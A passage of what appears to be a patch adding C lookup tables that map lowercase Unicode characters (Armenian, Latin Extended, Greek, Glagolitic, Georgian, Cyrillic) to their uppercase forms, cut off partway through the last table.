++	0x0000, 0x04b8, 0x0000, 0x04ba, 0x0000, 0x04bc, 0x0000, 0x04be,
++	0x0000, 0x0000, 0x04c1, 0x0000, 0x04c3, 0x0000, 0x04c5, 0x0000,
++	0x04c7, 0x0000, 0x04c9, 0x0000, 0x04cb, 0x0000, 0x04cd, 0x04c0,
++	0x0000, 0x04d0, 0x0000, 0x04d2, 0x0000, 0x04d4, 0x0000, 0x04d6,
++	0x0000, 0x04d8, 0x0000, 0x04da, 0x0000, 0x04dc, 0x0000, 0x04de,
++	0x0000, 0x04e0, 0x0000, 0x04e2, 0x0000, 0x04e4, 0x0000, 0x04e6,
++	0x0000, 0x04e8, 0x0000, 0x04ea, 0x0000, 0x04ec, 0x0000, 0x04ee,
++	0x0000, 0x04f0, 0x0000, 0x04f2, 0x0000, 0x04f4, 0x0000, 0x04f6,
++	0x0000, 0x04f8, 0x0000, 0x04fa, 0x0000, 0x04fc, 0x0000, 0x04fe,
++};
++
++static const wchar_t t2_05[256] = {
++	0x0000, 0x0500, 0x0000, 0x0502, 0x0000, 0x0504, 0x0000, 0x0506,
++	0x0000, 0x0508, 0x0000, 0x050a, 0x0000, 0x050c, 0x0000, 0x050e,
++	0x0000, 0x0510, 0x0000, 0x0512, 0x0000, 0x0514, 0x0000, 0x0516,
++	0x0000, 0x0518, 0x0000, 0x051a, 0x0000, 0x051c, 0x0000, 0x051e,
++	0x0000, 0x0520, 0x0000, 0x0522, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0531, 0x0532, 0x0533, 0x0534, 0x0535, 0x0536, 0x0537,
++	0x0538, 0x0539, 0x053a, 0x053b, 0x053c, 0x053d, 0x053e, 0x053f,
++	0x0540, 0x0541, 0x0542, 0x0543, 0x0544, 0x0545, 0x0546, 0x0547,
++	0x0548, 0x0549, 0x054a, 0x054b, 0x054c, 0x054d, 0x054e, 0x054f,
++	0x0550, 0x0551, 0x0552, 0x0553, 0x0554, 0x0555, 0x0556, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_1d[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0xa77d, 0x0000, 0x0000, 0x0000, 0x2c63, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_1e[256] = {
++	0x0000, 0x1e00, 0x0000, 0x1e02, 0x0000, 0x1e04, 0x0000, 0x1e06,
++	0x0000, 0x1e08, 0x0000, 0x1e0a, 0x0000, 0x1e0c, 0x0000, 0x1e0e,
++	0x0000, 0x1e10, 0x0000, 0x1e12, 0x0000, 0x1e14, 0x0000, 0x1e16,
++	0x0000, 0x1e18, 0x0000, 0x1e1a, 0x0000, 0x1e1c, 0x0000, 0x1e1e,
++	0x0000, 0x1e20, 0x0000, 0x1e22, 0x0000, 0x1e24, 0x0000, 0x1e26,
++	0x0000, 0x1e28, 0x0000, 0x1e2a, 0x0000, 0x1e2c, 0x0000, 0x1e2e,
++	0x0000, 0x1e30, 0x0000, 0x1e32, 0x0000, 0x1e34, 0x0000, 0x1e36,
++	0x0000, 0x1e38, 0x0000, 0x1e3a, 0x0000, 0x1e3c, 0x0000, 0x1e3e,
++	0x0000, 0x1e40, 0x0000, 0x1e42, 0x0000, 0x1e44, 0x0000, 0x1e46,
++	0x0000, 0x1e48, 0x0000, 0x1e4a, 0x0000, 0x1e4c, 0x0000, 0x1e4e,
++	0x0000, 0x1e50, 0x0000, 0x1e52, 0x0000, 0x1e54, 0x0000, 0x1e56,
++	0x0000, 0x1e58, 0x0000, 0x1e5a, 0x0000, 0x1e5c, 0x0000, 0x1e5e,
++	0x0000, 0x1e60, 0x0000, 0x1e62, 0x0000, 0x1e64, 0x0000, 0x1e66,
++	0x0000, 0x1e68, 0x0000, 0x1e6a, 0x0000, 0x1e6c, 0x0000, 0x1e6e,
++	0x0000, 0x1e70, 0x0000, 0x1e72, 0x0000, 0x1e74, 0x0000, 0x1e76,
++	0x0000, 0x1e78, 0x0000, 0x1e7a, 0x0000, 0x1e7c, 0x0000, 0x1e7e,
++	0x0000, 0x1e80, 0x0000, 0x1e82, 0x0000, 0x1e84, 0x0000, 0x1e86,
++	0x0000, 0x1e88, 0x0000, 0x1e8a, 0x0000, 0x1e8c, 0x0000, 0x1e8e,
++	0x0000, 0x1e90, 0x0000, 0x1e92, 0x0000, 0x1e94, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x1ea0, 0x0000, 0x1ea2, 0x0000, 0x1ea4, 0x0000, 0x1ea6,
++	0x0000, 0x1ea8, 0x0000, 0x1eaa, 0x0000, 0x1eac, 0x0000, 0x1eae,
++	0x0000, 0x1eb0, 0x0000, 0x1eb2, 0x0000, 0x1eb4, 0x0000, 0x1eb6,
++	0x0000, 0x1eb8, 0x0000, 0x1eba, 0x0000, 0x1ebc, 0x0000, 0x1ebe,
++	0x0000, 0x1ec0, 0x0000, 0x1ec2, 0x0000, 0x1ec4, 0x0000, 0x1ec6,
++	0x0000, 0x1ec8, 0x0000, 0x1eca, 0x0000, 0x1ecc, 0x0000, 0x1ece,
++	0x0000, 0x1ed0, 0x0000, 0x1ed2, 0x0000, 0x1ed4, 0x0000, 0x1ed6,
++	0x0000, 0x1ed8, 0x0000, 0x1eda, 0x0000, 0x1edc, 0x0000, 0x1ede,
++	0x0000, 0x1ee0, 0x0000, 0x1ee2, 0x0000, 0x1ee4, 0x0000, 0x1ee6,
++	0x0000, 0x1ee8, 0x0000, 0x1eea, 0x0000, 0x1eec, 0x0000, 0x1eee,
++	0x0000, 0x1ef0, 0x0000, 0x1ef2, 0x0000, 0x1ef4, 0x0000, 0x1ef6,
++	0x0000, 0x1ef8, 0x0000, 0x1efa, 0x0000, 0x1efc, 0x0000, 0x1efe,
++};
++
++static const wchar_t t2_1f[256] = {
++	0x1f08, 0x1f09, 0x1f0a, 0x1f0b, 0x1f0c, 0x1f0d, 0x1f0e, 0x1f0f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f18, 0x1f19, 0x1f1a, 0x1f1b, 0x1f1c, 0x1f1d, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f28, 0x1f29, 0x1f2a, 0x1f2b, 0x1f2c, 0x1f2d, 0x1f2e, 0x1f2f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f38, 0x1f39, 0x1f3a, 0x1f3b, 0x1f3c, 0x1f3d, 0x1f3e, 0x1f3f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f48, 0x1f49, 0x1f4a, 0x1f4b, 0x1f4c, 0x1f4d, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x1f59, 0x0000, 0x1f5b, 0x0000, 0x1f5d, 0x0000, 0x1f5f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f68, 0x1f69, 0x1f6a, 0x1f6b, 0x1f6c, 0x1f6d, 0x1f6e, 0x1f6f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1fba, 0x1fbb, 0x1fc8, 0x1fc9, 0x1fca, 0x1fcb, 0x1fda, 0x1fdb,
++	0x1ff8, 0x1ff9, 0x1fea, 0x1feb, 0x1ffa, 0x1ffb, 0x0000, 0x0000,
++	0x1f88, 0x1f89, 0x1f8a, 0x1f8b, 0x1f8c, 0x1f8d, 0x1f8e, 0x1f8f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f98, 0x1f99, 0x1f9a, 0x1f9b, 0x1f9c, 0x1f9d, 0x1f9e, 0x1f9f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1fa8, 0x1fa9, 0x1faa, 0x1fab, 0x1fac, 0x1fad, 0x1fae, 0x1faf,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1fb8, 0x1fb9, 0x0000, 0x1fbc, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x1fcc, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1fd8, 0x1fd9, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1fe8, 0x1fe9, 0x0000, 0x0000, 0x0000, 0x1fec, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x1ffc, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_21[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2132, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x2160, 0x2161, 0x2162, 0x2163, 0x2164, 0x2165, 0x2166, 0x2167,
++	0x2168, 0x2169, 0x216a, 0x216b, 0x216c, 0x216d, 0x216e, 0x216f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x2183, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_24[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x24b6, 0x24b7, 0x24b8, 0x24b9, 0x24ba, 0x24bb, 0x24bc, 0x24bd,
++	0x24be, 0x24bf, 0x24c0, 0x24c1, 0x24c2, 0x24c3, 0x24c4, 0x24c5,
++	0x24c6, 0x24c7, 0x24c8, 0x24c9, 0x24ca, 0x24cb, 0x24cc, 0x24cd,
++	0x24ce, 0x24cf, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_2c[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x2c00, 0x2c01, 0x2c02, 0x2c03, 0x2c04, 0x2c05, 0x2c06, 0x2c07,
++	0x2c08, 0x2c09, 0x2c0a, 0x2c0b, 0x2c0c, 0x2c0d, 0x2c0e, 0x2c0f,
++	0x2c10, 0x2c11, 0x2c12, 0x2c13, 0x2c14, 0x2c15, 0x2c16, 0x2c17,
++	0x2c18, 0x2c19, 0x2c1a, 0x2c1b, 0x2c1c, 0x2c1d, 0x2c1e, 0x2c1f,
++	0x2c20, 0x2c21, 0x2c22, 0x2c23, 0x2c24, 0x2c25, 0x2c26, 0x2c27,
++	0x2c28, 0x2c29, 0x2c2a, 0x2c2b, 0x2c2c, 0x2c2d, 0x2c2e, 0x0000,
++	0x0000, 0x2c60, 0x0000, 0x0000, 0x0000, 0x023a, 0x023e, 0x0000,
++	0x2c67, 0x0000, 0x2c69, 0x0000, 0x2c6b, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x2c72, 0x0000, 0x0000, 0x2c75, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x2c80, 0x0000, 0x2c82, 0x0000, 0x2c84, 0x0000, 0x2c86,
++	0x0000, 0x2c88, 0x0000, 0x2c8a, 0x0000, 0x2c8c, 0x0000, 0x2c8e,
++	0x0000, 0x2c90, 0x0000, 0x2c92, 0x0000, 0x2c94, 0x0000, 0x2c96,
++	0x0000, 0x2c98, 0x0000, 0x2c9a, 0x0000, 0x2c9c, 0x0000, 0x2c9e,
++	0x0000, 0x2ca0, 0x0000, 0x2ca2, 0x0000, 0x2ca4, 0x0000, 0x2ca6,
++	0x0000, 0x2ca8, 0x0000, 0x2caa, 0x0000, 0x2cac, 0x0000, 0x2cae,
++	0x0000, 0x2cb0, 0x0000, 0x2cb2, 0x0000, 0x2cb4, 0x0000, 0x2cb6,
++	0x0000, 0x2cb8, 0x0000, 0x2cba, 0x0000, 0x2cbc, 0x0000, 0x2cbe,
++	0x0000, 0x2cc0, 0x0000, 0x2cc2, 0x0000, 0x2cc4, 0x0000, 0x2cc6,
++	0x0000, 0x2cc8, 0x0000, 0x2cca, 0x0000, 0x2ccc, 0x0000, 0x2cce,
++	0x0000, 0x2cd0, 0x0000, 0x2cd2, 0x0000, 0x2cd4, 0x0000, 0x2cd6,
++	0x0000, 0x2cd8, 0x0000, 0x2cda, 0x0000, 0x2cdc, 0x0000, 0x2cde,
++	0x0000, 0x2ce0, 0x0000, 0x2ce2, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_2d[256] = {
++	0x10a0, 0x10a1, 0x10a2, 0x10a3, 0x10a4, 0x10a5, 0x10a6, 0x10a7,
++	0x10a8, 0x10a9, 0x10aa, 0x10ab, 0x10ac, 0x10ad, 0x10ae, 0x10af,
++	0x10b0, 0x10b1, 0x10b2, 0x10b3, 0x10b4, 0x10b5, 0x10b6, 0x10b7,
++	0x10b8, 0x10b9, 0x10ba, 0x10bb, 0x10bc, 0x10bd, 0x10be, 0x10bf,
++	0x10c0, 0x10c1, 0x10c2, 0x10c3, 0x10c4, 0x10c5, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_a6[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0xa640, 0x0000, 0xa642, 0x0000, 0xa644, 0x0000, 0xa646,
++	0x0000, 0xa648, 0x0000, 0xa64a, 0x0000, 0xa64c, 0x0000, 0xa64e,
++	0x0000, 0xa650, 0x0000, 0xa652, 0x0000, 0xa654, 0x0000, 0xa656,
++	0x0000, 0xa658, 0x0000, 0xa65a, 0x0000, 0xa65c, 0x0000, 0xa65e,
++	0x0000, 0x0000, 0x0000, 0xa662, 0x0000, 0xa664, 0x0000, 0xa666,
++	0x0000, 0xa668, 0x0000, 0xa66a, 0x0000, 0xa66c, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0xa680, 0x0000, 0xa682, 0x0000, 0xa684, 0x0000, 0xa686,
++	0x0000, 0xa688, 0x0000, 0xa68a, 0x0000, 0xa68c, 0x0000, 0xa68e,
